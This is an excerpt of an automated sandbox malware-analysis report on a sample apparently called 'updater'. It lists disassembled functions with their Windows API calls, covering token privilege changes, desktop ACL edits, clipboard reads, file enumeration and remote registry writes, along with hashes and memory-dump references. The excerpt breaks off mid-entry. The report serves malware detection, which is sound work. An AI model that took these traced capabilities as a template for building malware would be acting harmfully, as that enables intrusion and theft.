Function 017AE451 Relevance: 1.3, APIs: 1, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 017AE4EA

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 00be47e1849a4ad4901c19508398125c9bc51ffc4282ee863e31bc5554498c44
Instruction ID: 439d948c606806d3f7ed9aa58a382e3a0ed693b653534d5659ae2b8211d4a42b
Opcode Fuzzy Hash: 00be47e1849a4ad4901c19508398125c9bc51ffc4282ee863e31bc5554498c44
Instruction Fuzzy Hash: B52100B5604246DFC750CF2CD880A5ABBE4FF88710F548A68F998CB344E730E944CB52

Function 017AE389 Relevance: 1.3, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 017AE402

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c48e5b571c0e584b870c558ee4281a55554d237779642c59739a0ebcd94b7ebc
Instruction ID: aa85c9685a1a64d768431c09e30f91dc4646775e676bdc47a6a9ac53c8823141
Opcode Fuzzy Hash: c48e5b571c0e584b870c558ee4281a55554d237779642c59739a0ebcd94b7ebc
Instruction Fuzzy Hash: 19218C746083029FC760DF19D884A1AFBE4EB88360F648A6DF5A88B251D731A980CB56

Function 017AE511 Relevance: 1.3, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,?,00004000), ref: 017AE5A1

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 35ce89cc6355e272bc7a2615d8309642e968271a26f3908f04ec8e3ba767b7a9
Instruction ID: c956d9a063e94695061f4b73f1876d82713d97c99a57d49e7b6b4fd2b8537bc8
Opcode Fuzzy Hash: 35ce89cc6355e272bc7a2615d8309642e968271a26f3908f04ec8e3ba767b7a9
Instruction Fuzzy Hash: C521B0B5605202CFC761CF2CE884A1ABBF0FF99310B644968E5D8CB355E731E904CB92

Function 017C6C8D Relevance: 1.3, APIs: 1, Instructions: 39sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 017C6BF9: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,017C6C7D), ref: 017C6C3E
Part of subcall function 017C6BF9: WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,017C6C7D), ref: 017C6C56
Part of subcall function 017C6BF9: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,017C6C7D), ref: 017C6C62

Sleep.KERNEL32(00000002,00000000,017C6CFE), ref: 017C6CDE

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: File$CloseCreateHandleSleepWrite
String ID:
API String ID: 1443029356-0
Opcode ID: 849203bdee0ef29537959ffe788ee0f7d0450e3752820e02180434e86627c393
Instruction ID: 9fd7d055c8d9f1efa6d0a4b9d96b7e4ae5a31588f10af809e00a8fc43e51b6e0
Opcode Fuzzy Hash: 849203bdee0ef29537959ffe788ee0f7d0450e3752820e02180434e86627c393
Instruction Fuzzy Hash: 22F08174A0460DEFD701EBA9D9E9BDDF7F8EB08700F6040B9A504D2758EB30AE50D651

Function 017C6D04 Relevance: 1.3, APIs: 1, Instructions: 38sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 017C6BF9: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,017C6C7D), ref: 017C6C3E
Part of subcall function 017C6BF9: WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,017C6C7D), ref: 017C6C56
Part of subcall function 017C6BF9: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,017C6C7D), ref: 017C6C62

Sleep.KERNEL32(00000002,00000000,017C6CFE), ref: 017C6CDE

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: File$CloseCreateHandleSleepWrite
String ID:
API String ID: 1443029356-0
Opcode ID: 7f0f59d7d04a411a25913eeb3ff78d92f1e7a469fa9d83736caa075664f98707
Instruction ID: 79300b7d671fb4e92e31fabf932b2cb3ec22392b7c9d7efe5a3d55ebc310770c
Opcode Fuzzy Hash: 7f0f59d7d04a411a25913eeb3ff78d92f1e7a469fa9d83736caa075664f98707
Instruction Fuzzy Hash: F7F06974A0460CEEDB11EBA4D9A9BEDF7F8EB48700F6044B9A40492718EB30AE509A10

Function 017D4D59 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17cf000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
Instruction ID: e865b27e49911777c0adcfccfb86e889ad99af2feaaa45be921857e1971cfc50
Opcode Fuzzy Hash: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
Instruction Fuzzy Hash: C631D52110C60ABAEF218A6CCC44BA3FB78BF0A274F140355E6D7A3D92D730A954C7A5

Non-executed Functions

Function 00C3D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BB29F3

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C3D208
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C3D249
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00C3D28E
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C3D2B8
SendMessageW.USER32 ref: 00C3D2E1
_wcsncpy.LIBCMT ref: 00C3D359
GetKeyState.USER32(00000011), ref: 00C3D37A
GetKeyState.USER32(00000009), ref: 00C3D387
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C3D39D
GetKeyState.USER32(00000010), ref: 00C3D3A7
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C3D3D0
SendMessageW.USER32 ref: 00C3D3F7
SendMessageW.USER32(?,00001030,?,00C3B9BA), ref: 00C3D4FD
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C3D513
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C3D526
SetCapture.USER32(?), ref: 00C3D52F
ClientToScreen.USER32(?,?), ref: 00C3D594
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C3D5A1
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C3D5BB
ReleaseCapture.USER32 ref: 00C3D5C6
GetCursorPos.USER32(?), ref: 00C3D600
ScreenToClient.USER32(?,?), ref: 00C3D60D
SendMessageW.USER32(?,00001012,00000000,?), ref: 00C3D669
SendMessageW.USER32 ref: 00C3D697
SendMessageW.USER32(?,00001111,00000000,?), ref: 00C3D6D4
SendMessageW.USER32 ref: 00C3D703
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C3D724
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C3D733
GetCursorPos.USER32(?), ref: 00C3D753
ScreenToClient.USER32(?,?), ref: 00C3D760
GetParent.USER32(?), ref: 00C3D780
SendMessageW.USER32(?,00001012,00000000,?), ref: 00C3D7E9
SendMessageW.USER32 ref: 00C3D81A
ClientToScreen.USER32(?,?), ref: 00C3D878
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C3D8A8
SendMessageW.USER32(?,00001111,00000000,?), ref: 00C3D8D2
SendMessageW.USER32 ref: 00C3D8F5
ClientToScreen.USER32(?,?), ref: 00C3D947
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C3D97B

Part of subcall function 00BB29AB: GetWindowLongW.USER32(?,000000EB), ref: 00BB29BC

GetWindowLongW.USER32(?,000000F0), ref: 00C3DA17

Strings

F, xrefs: 00C3D8FB
@GUI_DRAGID, xrefs: 00C3D562

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: dc71832b9bb55e997923277773ae33910e59a47d40c217b2c59cee595387b9bd
Instruction ID: 16850ab9246f091c382aa41b74a46eae18df5989c4c0ae27cf59449c22fcebc3
Opcode Fuzzy Hash: dc71832b9bb55e997923277773ae33910e59a47d40c217b2c59cee595387b9bd
Instruction Fuzzy Hash: 0242BC74214341AFC724CF28D848BAEBBF5FF49320F140619FAAA872A1C7719D54CB92

Function 00C08F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00C09399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C093E3
Part of subcall function 00C09399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C09410
Part of subcall function 00C09399: GetLastError.KERNEL32 ref: 00C0941D

_memset.LIBCMT ref: 00C08F71
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C08FC3
CloseHandle.KERNEL32(?), ref: 00C08FD4
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C08FEB
GetProcessWindowStation.USER32 ref: 00C09004
SetProcessWindowStation.USER32(00000000), ref: 00C0900E
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C09028

Part of subcall function 00C08DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C08F27), ref: 00C08DFE
Part of subcall function 00C08DE9: CloseHandle.KERNEL32(?,?,00C08F27), ref: 00C08E10

Strings

, xrefs: 00C08F80
default, xrefs: 00C09023
winsta0, xrefs: 00C08FE6

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 626aeeb1c9fd9d57f4e495e133f256781251e7e3b34b6a5c1775b0c2bf3a946d
Instruction ID: 43d21167beaf24aaf1e299869275b33ad44a92294a052aa13c1ef95c1afef2d3
Opcode Fuzzy Hash: 626aeeb1c9fd9d57f4e495e133f256781251e7e3b34b6a5c1775b0c2bf3a946d
Instruction Fuzzy Hash: 2781597590020ABFDF119FA4DC49BEEBBB9FF05314F144159F921A22A2D7318E15DB60

Function 00C24632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00C40980), ref: 00C2465C
IsClipboardFormatAvailable.USER32(0000000D), ref: 00C2466A
GetClipboardData.USER32(0000000D), ref: 00C24672
CloseClipboard.USER32 ref: 00C2467E
GlobalLock.KERNEL32(00000000), ref: 00C2469A
CloseClipboard.USER32 ref: 00C246A4
GlobalUnlock.KERNEL32(00000000), ref: 00C246B9
IsClipboardFormatAvailable.USER32(00000001), ref: 00C246C6
GetClipboardData.USER32(00000001), ref: 00C246CE
GlobalLock.KERNEL32(00000000), ref: 00C246DB
GlobalUnlock.KERNEL32(00000000), ref: 00C2470F
CloseClipboard.USER32 ref: 00C2481F

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 2b4500fddb2fa4d213141c36334395e7d3239daddc778d39d06829c5a49d18f0
Instruction ID: b2ff293463177a895b87352fd4cd1dd2a187e90a83b3226744bcff50e3860fe2
Opcode Fuzzy Hash: 2b4500fddb2fa4d213141c36334395e7d3239daddc778d39d06829c5a49d18f0
Instruction Fuzzy Hash: 9E51C235284211ABD304EF64EC89FBE73A8BF85B00F104529FA5AD61E2DF70D905CB62

Function 00C1CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C1CDD0
FindClose.KERNEL32(00000000), ref: 00C1CE24
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C1CE49
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C1CE60
FileTimeToSystemTime.KERNEL32(?,?), ref: 00C1CE87
__swprintf.LIBCMT ref: 00C1CED3
__swprintf.LIBCMT ref: 00C1CF16

Part of subcall function 00BC1A36: _memmove.LIBCMT ref: 00BC1A77

__swprintf.LIBCMT ref: 00C1CF6A

Part of subcall function 00BD38C8: __woutput_l.LIBCMT ref: 00BD3921

__swprintf.LIBCMT ref: 00C1CFB8

Part of subcall function 00BD38C8: __flsbuf.LIBCMT ref: 00BD3943
Part of subcall function 00BD38C8: __flsbuf.LIBCMT ref: 00BD395B

__swprintf.LIBCMT ref: 00C1D007
__swprintf.LIBCMT ref: 00C1D056
__swprintf.LIBCMT ref: 00C1D0A5

Strings

%4d, xrefs: 00C1CF10
%4d%02d%02d%02d%02d%02d, xrefs: 00C1CECD
%02d, xrefs: 00C1CF5E, 00C1CF68, 00C1CFB6, 00C1D005, 00C1D054, 00C1D0A3

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: d51768fed166c536e04fcccbcc1099717d9e1d791393f77dd5bb79e87ce26ea3
Instruction ID: 80b55744768151c97e328e3ea4aca3bd9aaa6ef06f734fedbcc4264cd2967b4e
Opcode Fuzzy Hash: d51768fed166c536e04fcccbcc1099717d9e1d791393f77dd5bb79e87ce26ea3
Instruction Fuzzy Hash: B0A13AB1404304ABC710EFA4C986EAFB7ECFF95704F40096DF59586192EB70EA49CB62

Function 00C1F5D8 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00C1F5F9
_wcscmp.LIBCMT ref: 00C1F60E
_wcscmp.LIBCMT ref: 00C1F625
GetFileAttributesW.KERNEL32(?), ref: 00C1F637
SetFileAttributesW.KERNEL32(?,?), ref: 00C1F651
FindNextFileW.KERNEL32(00000000,?), ref: 00C1F669
FindClose.KERNEL32(00000000), ref: 00C1F674
FindFirstFileW.KERNEL32(*.*,?), ref: 00C1F690
_wcscmp.LIBCMT ref: 00C1F6B7
_wcscmp.LIBCMT ref: 00C1F6CE
SetCurrentDirectoryW.KERNEL32(?), ref: 00C1F6E0
SetCurrentDirectoryW.KERNEL32(00C6B578), ref: 00C1F6FE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C1F708
FindClose.KERNEL32(00000000), ref: 00C1F715
FindClose.KERNEL32(00000000), ref: 00C1F727

Strings

*.*, xrefs: 00C1F68B

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: be9fc899681cc4ed21c7701c060e11a9ef7e9fee07816462a523e5468d2b593e
Instruction ID: 96223770b39a845447676e804f3a678040d51058bc650dcb4eda6cb4eea5853d
Opcode Fuzzy Hash: be9fc899681cc4ed21c7701c060e11a9ef7e9fee07816462a523e5468d2b593e
Instruction Fuzzy Hash: A831A575641219AADB20DFB4DC49BDE77ACAF0B321F200179F914D21E0EB70DE85DA60

Function 00C30EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C30FB3
RegCreateKeyExW.ADVAPI32(?,?,00000000,00C40980,00000000,?,00000000,?,?), ref: 00C31021
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00C31069
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00C310F2
RegCloseKey.ADVAPI32(?), ref: 00C31412
RegCloseKey.ADVAPI32(00000000), ref: 00C3141F

Strings

REG_SZ, xrefs: 00C31130
REG_MULTI_SZ, xrefs: 00C311DA
REG_QWORD, xrefs: 00C31360
REG_BINARY, xrefs: 00C313AD
REG_DWORD, xrefs: 00C312E3
REG_EXPAND_SZ, xrefs: 00C3108F

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: bc26b805e5c71ec432189f3570ed15c3401644fc77271a77d32b6dfc540227f4
Instruction ID: 0965e8c7814c02bcc46c1d37797194b6f91654a5ef5c42b7c22d8f195ff1b65f
Opcode Fuzzy Hash: bc26b805e5c71ec432189f3570ed15c3401644fc77271a77d32b6dfc540227f4
Instruction Fuzzy Hash: B2027D752106019FCB14EF25C881E6AB7E5FF89710F0489ADF99A9B362CB70ED41CB91

Function 017B1FED Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 017B200A
GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 017B201B
lstrcpyn.KERNEL32(?,?,?,?,?,kernel32.dll), ref: 017B204F
lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 017B20C0
lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll), ref: 017B20FB
FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll), ref: 017B210E
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 017B211B
lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 017B2127
lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 017B215B
lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 017B2167
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 017B2190

Strings

kernel32.dll, xrefs: 017B2005
\, xrefs: 017B2139
GetLongPathNameA, xrefs: 017B2015

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: e4cb282e76d4ddb9248a3e395ecc11bf03070d37ab609ace96ef7f273cf5bb08
Instruction ID: 7925d4424cba87c7b889fce62aaddc791efef8229648e906aa5d7be1efa0e785
Opcode Fuzzy Hash: e4cb282e76d4ddb9248a3e395ecc11bf03070d37ab609ace96ef7f273cf5bb08
Instruction Fuzzy Hash: 0E5106B1A0121DEFDB11DAE8CCC8BEEF7B9AF48200F5405A5A615E7241D734AA458BA0

Function 00C1F735 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00C1F756
_wcscmp.LIBCMT ref: 00C1F76B
_wcscmp.LIBCMT ref: 00C1F782

Part of subcall function 00C14875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C14890

FindNextFileW.KERNEL32(00000000,?), ref: 00C1F7B1
FindClose.KERNEL32(00000000), ref: 00C1F7BC
FindFirstFileW.KERNEL32(*.*,?), ref: 00C1F7D8
_wcscmp.LIBCMT ref: 00C1F7FF
_wcscmp.LIBCMT ref: 00C1F816
SetCurrentDirectoryW.KERNEL32(?), ref: 00C1F828
SetCurrentDirectoryW.KERNEL32(00C6B578), ref: 00C1F846
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C1F850
FindClose.KERNEL32(00000000), ref: 00C1F85D
FindClose.KERNEL32(00000000), ref: 00C1F86F

Strings

*.*, xrefs: 00C1F7D3

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 86c3384faef96878fec661af6c8d44a2db9c4c5306399b33ff8e8605a2eff0be
Instruction ID: 15985744907be929a2de871c0ec250ea83186e0c5fd68766ef73e0c2ddbcc928
Opcode Fuzzy Hash: 86c3384faef96878fec661af6c8d44a2db9c4c5306399b33ff8e8605a2eff0be
Instruction Fuzzy Hash: 7E31C776540619BAEB20DB74DC48BDE77ACAF0B321F240179E914E21E1DB70CF86DA60

Function 00C088CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C08E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C08E3C
Part of subcall function 00C08E20: GetLastError.KERNEL32(?,00C08900,?,?,?), ref: 00C08E46
Part of subcall function 00C08E20: GetProcessHeap.KERNEL32(00000008,?,?,00C08900,?,?,?), ref: 00C08E55
Part of subcall function 00C08E20: HeapAlloc.KERNEL32(00000000,?,00C08900,?,?,?), ref: 00C08E5C
Part of subcall function 00C08E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C08E73

Part of subcall function 00C08EBD: GetProcessHeap.KERNEL32(00000008,00C08916,00000000,00000000,?,00C08916,?), ref: 00C08EC9
Part of subcall function 00C08EBD: HeapAlloc.KERNEL32(00000000,?,00C08916,?), ref: 00C08ED0
Part of subcall function 00C08EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C08916,?), ref: 00C08EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C08931
_memset.LIBCMT ref: 00C08946
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C08965
GetLengthSid.ADVAPI32(?), ref: 00C08976
GetAce.ADVAPI32(?,00000000,?), ref: 00C089B3
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C089CF
GetLengthSid.ADVAPI32(?), ref: 00C089EC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C089FB
HeapAlloc.KERNEL32(00000000), ref: 00C08A02
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C08A23
CopySid.ADVAPI32(00000000), ref: 00C08A2A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C08A5B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C08A81
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C08A95

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
